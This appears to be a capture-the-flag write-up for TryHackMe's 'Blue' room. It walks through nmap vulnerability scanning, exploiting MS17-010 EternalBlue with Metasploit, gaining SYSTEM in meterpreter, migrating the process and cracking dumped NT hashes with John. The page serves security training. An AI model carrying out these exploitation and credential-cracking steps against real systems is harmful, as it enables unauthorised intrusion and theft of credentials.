đź‘€
WriteUps
  • WHOAMI
  • Try Hack Me - THM
    • Linux Boxes
      • Simple CTF
      • Basic Pentesting
      • Kenobi
      • TomGhost
      • Game Zone
      • Skynet
      • Daily Bugle
      • Dogcat
      • Anonymous
      • Wonderland
      • Blog
      • HaskHell
    • Windows Boxes
      • Blue
      • Alfred
      • HackPark
      • Retro
    • Windows Rooms
      • Windows Exploitation
        • Intro to Windows
        • Windows Fundamentals 1
        • Windows Fundamentals 2
      • Active Directory
        • Active Directory Basics
    • Privilege Escalation Rooms
      • Linux
        • Linux PrivEsc
        • Common Linux Privesc
      • Windows
        • Windows PrivEsc
    • Crypto Rooms
      • Hashing - Crypto 101
      • Encryption - Crypto 101
    • Web Rooms
      • OWASP Top 10
        • 1. Injection
        • 2. Broken Authentication
        • 3. Sensitive Data Exposure
        • 4. XML External Entity
        • 5. Broken Access Control
        • 6. Security Misconfiguration
        • 7. Cross-site Scripting
        • 8. Insecure Deserialization
        • 9. Components with Known Vulnerabilities
        • 10. Insufficent Logging & Monitoring
    • MISC
      • Tools
        • John The Ripper
        • Metasploit
      • Git Happens
      • What the Shell?
  • HACK THE BOX - HTB
    • Linux Boxes
      • CAP
      • KNIFE
      • BOUNTYHUNTER
      • PREVISE
      • DYNSTR
      • PIT
      • SEAL
  • VulnHub
    • KIOPTRIX Series
      • KIOPTRIX Level 1 (#1)
      • KIOPTRIX Level 1.1 (#2)
      • KIOPTRIX Level 1.2 (#3)
      • KIOPTRIX Level 1.3 (#4)
    • Privilege Escalation
      • Escalate Linux
      • Escalate My Privilege
    • MISC
      • Misdirection
      • TOPPO
      • NULLBYTE
Powered by GitBook
On this page
  • Scanning
  • Exploit
  1. Try Hack Me - THM
  2. Windows Boxes

Blue

Deploy & hack into a Windows machine, leveraging common misconfigurations issues.

Scanning

nmap -sV --script vuln $IP

Commands:

-sV – checks the version of the running services

–script vuln – runs some scripts so we can answer question

Exploit

Now i won’t paste the whole output we are only interested in ms17-010. Now let’s open metasploit and confirm if the host if vulnerable or not:

msfconsole

Now we use the command search to find the module that we want:

search eternal

And we found it now let’s use it:

use auxiliary/scanner/smb/smb_ms17_010

Now we need to specify the rhost:

set rhost $IP
#to run the module type:
run

Output:

Sweet now we can use the exploit for Eternal Blue:

#type this to deselect the current module:
back
#now for the new module:
use exploit/windows/smb/ms17_010_eternalblue

Let’s see the options that we need to specify:

options

Let’s specify the rhost and we are good to go:

#target's ip
set rhost $ip
#your ip now:
set lhost tun0
run

And we are in:

Now we can migrate our process to another that is running from the user “authority\system”:

First type “getsystem” in the meterpreter in order to get more access so we can migrate the process. Then type:

migrate $numberoftheprocessyouchoose

Now we can dumb the hash and crack it:

echo "#thehashyoufound" > hash.hash

Now we can use john to crack the hashes:

john hash.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=NT

The flags are located in the following directories:

  • C:\ – flag1

  • C:\Windows\System32\config – flag2

  • C:\Users\Jon\Documents – flag3

PreviousWindows BoxesNextAlfred

Last updated 3 years ago